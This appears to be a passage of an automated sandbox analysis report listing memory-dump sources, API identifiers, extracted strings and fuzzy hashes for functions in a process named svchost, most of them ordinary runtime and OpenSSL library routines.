• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: FeaturePresentProcessor_invalid_parameter_noinfo
• String ID:
• API String ID: 1808705829-0
• Opcode ID: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
• Instruction ID: c4b7382a9d6cae43b54c37f6313c9643543a2988fd0af54ab5e087ae6145f988
• Opcode Fuzzy Hash: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
• Instruction Fuzzy Hash: 4B318621B1864AC2FA786F91A4B12BD7254AF87B84F648434DA4D076D7DF3DE801C791
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
• Instruction ID: e954db05b43db8a0bb19b790385154669749875f5896c5f989ea6c928fa66a63
• Opcode Fuzzy Hash: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
• Instruction Fuzzy Hash: EB11D361718B8581DA208B65B4A4269B361BB46BF4F648335EABD4B7E6CF7CD050C780
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
• Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
Similarity
• API ID: closesocketsocket
• String ID:
• API String ID: 2760038618-0
• Opcode ID: 1bb5e56c693462f46d2aa040be695f2e65611b92022052426d77c3839de081a9
• Instruction ID: 48ac835655b2797bb9bd7a6dcff65c7bafd5d63c91ba06c2358fddf17097b680
• Opcode Fuzzy Hash: 1bb5e56c693462f46d2aa040be695f2e65611b92022052426d77c3839de081a9
• Instruction Fuzzy Hash: 3001D152B067C587FFC887A590D17B82641AB14B76F0C5274CE2E163C2CE5E88D5C310
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
• Opcode ID: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
• Instruction ID: a64b99ce710f114b1012c82136832f3b0bed84b0a3334619a1a7b634354de88d
• Opcode Fuzzy Hash: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
• Instruction Fuzzy Hash: 17F0B650F1E10BC5FD7866E254F12B922A01F5E7A4F188B30D92F952D3EE1CE451D690
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
• Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
Similarity
• API ID: ExclusiveLock$AcquireRelease
• String ID:
• API String ID: 17069307-0
• Opcode ID: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
• Instruction ID: 83146bfcc1e15a96356f73e06562c9077182f8ef1ffa34857fbc01f31fc78fee
• Opcode Fuzzy Hash: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
• Instruction Fuzzy Hash: B3D09E24F5665283EB445F60A8E50B432A3AF9C315F401035C95F563A3DE2EED9D8758
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
• Instruction ID: eb6dc1e3bbe805eb6a492bb8a93836fa895a1a646974affeaa3c67bd75e6135e
• Opcode Fuzzy Hash: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
• Instruction Fuzzy Hash: 5621A451B1864A81FE74A7E5A5F027D32825F867A4F24C235EA2E577D3DF6CE441C340
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
• Instruction ID: d18793a26732304a746fd4da8d9def83a37620268d2b7f412a78ca52754df88d
• Opcode Fuzzy Hash: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
• Instruction Fuzzy Hash: 59219532708646C6DB718F58D4D037976A1EB85B94F248234DB5D476DADF3DD404CB40
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
• Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
Similarity
• API ID: socket
• String ID:
• API String ID: 98920635-0
• Opcode ID: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
• Instruction ID: 381bd5833047d7b3bb59e757b0e462d32c70e32bd7959b4d3ae684a90b870bfc
• Opcode Fuzzy Hash: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
• Instruction Fuzzy Hash: FA11EB36B09B9192D758CF22E09022D73A2FB88BA4F188234DBAD13785CF3DD491C704
APIs
  • Part of subcall function 00007FFD94736CC0: HeapAlloc.KERNEL32(?,?,00000000,00007FFD94737157), ref: 00007FFD94736D15
• InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FFD9474612D,?,?,?,?,?,00007FFD94747280), ref: 00007FFD94745E73
Memory Dump Source
• Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
• Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
Similarity
• API ID: AllocCriticalHeapInitializeSection
• String ID:
• API String ID: 2538999594-0
• Opcode ID: 6cd5710082f98f1af29d588ed0d0b39595080e41d2b5434fa37d833c2199aad1
• Instruction ID: 6f18f9fe98d3a53addecedcf3487f2f446d1242a5ccafa2d6a4868e1669c9b64
• Opcode Fuzzy Hash: 6cd5710082f98f1af29d588ed0d0b39595080e41d2b5434fa37d833c2199aad1
• Instruction Fuzzy Hash: DF11E33272879582E724CB65E59016D7760FB42B90FA8C635E36D07BC6DF38E462C740
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 3215553584-0
                                                                                            • Opcode ID: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                                                                                            • Instruction ID: a1c6d85178fd6ec9240b5ab9d57ebb3609817e9563c6fd7c3c9b1a3b65010052
                                                                                            • Opcode Fuzzy Hash: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                                                                                            • Instruction Fuzzy Hash: 5AE0ED71B5910AC6FE396BF099B13BD32505F92305FA4C030D108462C3DF2D2802C7A1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap
                                                                                            • String ID:
                                                                                            • API String ID: 4292702814-0
                                                                                            • Opcode ID: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                                                                                            • Instruction ID: 9ade36581fd7b2f9d26080d00903fa506db418a3fe192c146ab4509bad950338
                                                                                            • Opcode Fuzzy Hash: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                                                                                            • Instruction Fuzzy Hash: 61F01254B1960EC1FEB857E179B13B526856F87B80F6CD430D90D8A2D3ED1CF545C294
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FFD9473ED8D,?,?,00000000,00007FFD947419AF,?,?,?,00007FFD9473673F,?,?,?,00007FFD94736635), ref: 00007FFD94736DDE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                             • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap
                                                                                            • String ID:
                                                                                            • API String ID: 4292702814-0
                                                                                            • Opcode ID: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                                                                                            • Instruction ID: 78b60e2a03d1071c5326401daa2082fe525cbbb2e6b0a76f3a993fa8c2bbc86e
                                                                                            • Opcode Fuzzy Hash: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                                                                                            • Instruction Fuzzy Hash: 80F05E10B2960AC1FE7C26E169F027531945F877A0F18C230DD2E8A2C7EE1CF441C290
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugX509_free$L_sk_new_nullR_vset_error
                                                                                            • String ID: ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                            • API String ID: 3750526228-3872095317
                                                                                            • Opcode ID: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                            • Instruction ID: c90cbe8c60b93920a8a55db58fdd7069d10decdb15007597942099b5580db9e8
                                                                                            • Opcode Fuzzy Hash: 2245cf865578e7a48e5514ed147dcc870c3e1326ddd966a616d1f47169671059
                                                                                            • Instruction Fuzzy Hash: 0B22A221B0A78282F750DB65D4602BC27A2FF48784F5CA436DA4DA7797DE3EE581C318
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 880fcf0aaa95977a11b34ac96da284ab8df0db3b6a86f21f0cf2ac63f8941c71
                                                                                            • Instruction ID: 2ab884b43274ae8bd27f003c0a70cf6485c1be0c11ea69e2ebe3f0b289316fb9
                                                                                            • Opcode Fuzzy Hash: 880fcf0aaa95977a11b34ac96da284ab8df0db3b6a86f21f0cf2ac63f8941c71
                                                                                            • Instruction Fuzzy Hash: F8910262AB9059CBF305D7A89C6936D6F41EB67348FC46E33D90987780EAAECD41C305
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ebf0dfba0df26e46b46dc2b9a221c586dc83cf457bec769d9e91ed8af7c6d6f
                                                                                            • Instruction ID: a81085690ef107ea556ab939f7474760f04922ae039f1ecf93e826bcd2b62937
                                                                                            • Opcode Fuzzy Hash: 7ebf0dfba0df26e46b46dc2b9a221c586dc83cf457bec769d9e91ed8af7c6d6f
                                                                                            • Instruction Fuzzy Hash: B771D57A9AD1154FF216DFE989A83BE6F51EB5734CFC07A32D91A43240DBB8CD818240
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: d1a9d616328bb2d58e2b9b2ac429b2c37c5e4b48c5cea1ef9bda06d7f884e913
                                                                                            • Instruction ID: 4071964e9e39717f0edfbfbf1b025a01c2e84b9df4f06fb179bc4b95b9b69bbe
                                                                                            • Opcode Fuzzy Hash: d1a9d616328bb2d58e2b9b2ac429b2c37c5e4b48c5cea1ef9bda06d7f884e913
                                                                                            • Instruction Fuzzy Hash: 34912932A1551A86F700DB98C8943AD7F62F752708FC46A32D61DC33D4EBAADD46C7A0
                                                                                            APIs
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36384C8
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638503
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36385B8
                                                                                            • GetCurrentProcessId.KERNEL32(02000100,00007FFDA3637837,?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA36385F8
                                                                                            • OpenSSL_version.LIBCRYPTO-3-X64(?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638655
                                                                                            • BIO_snprintf.LIBCRYPTO-3-X64(?,00007FFDA36396C5,02000100,00007FFDA363E4EE,?,00007FFDA3640F14), ref: 00007FFDA3638673
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$CurrentL_versionO_snprintfOpenProcess
                                                                                            • String ID: 0.3$JSON-SEQ$OpenSSL/%s (%s)$QUIC$client$common_fields$delta$description$group_id$name$process_id$protocol_type$qlog_format$qlog_version$server$ssl\quic\qlog.c$system_info$time_format$title$trace$type$vantage_point
                                                                                            • API String ID: 2463599471-1827591402
                                                                                            • Opcode ID: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                            • Instruction ID: 2f2c1e7a5eac90844005cba23759d903a3d80ca752b25cf371553df434009bab
                                                                                            • Opcode Fuzzy Hash: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                            • Instruction Fuzzy Hash: 2E812EA0B0E64251F959EB12A2B13FD6363EF857C0F486431DA4E27797DFAEE0058319
                                                                                            APIs
                                                                                            Strings
                                                                                            • (, xrefs: 6601078D
                                                                                            • (+&+:+,+*+0+.+4+2+9+%+'+)+=+>+-+1+++/+3+5+6+7+8+?+"+;+<+$+#+!+e/!/"/#/$/%/&/'/(/)/*/+/,/L/M/N/O/P/Q/R/S/T/U/V/W/X/Y/Z/[/\/]/^/_/`/a/b/c/d/-/.///0/1/2/3/4/5/6/7/8/9/:/;/</=/>/?/@/A/B/C/D/E/F/G/H/I/J/K/!zv,#z|/8z",.z,z#.$.-z%.#,/z1z0z&.>z2z3z6z$,5z4z7zy,(.'.%,z,, xrefs: 660108FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: ($(+&+:+,+*+0+.+4+2+9+%+'+)+=+>+-+1+++/+3+5+6+7+8+?+"+;+<+$+#+!+e/!/"/#/$/%/&/'/(/)/*/+/,/L/M/N/O/P/Q/R/S/T/U/V/W/X/Y/Z/[/\/]/^/_/`/a/b/c/d/-/.///0/1/2/3/4/5/6/7/8/9/:/;/</=/>/?/@/A/B/C/D/E/F/G/H/I/J/K/!zv,#z|/8z",.z,z#.$.-z%.#,/z1z0z&.>z2z3z6z$,5z4z7zy,(.'.%,z,
                                                                                            • API String ID: 4206212132-106588582
                                                                                            • Opcode ID: 41c11e927b261fe9d7886e52c157cd6990bd5bc32e96f99b242d03ceec02bf85
                                                                                            • Instruction ID: a6c50dc65798e8c864702d2a8668b785b3ff8722fc7070365746fa8f8e2465cc
                                                                                            • Opcode Fuzzy Hash: 41c11e927b261fe9d7886e52c157cd6990bd5bc32e96f99b242d03ceec02bf85
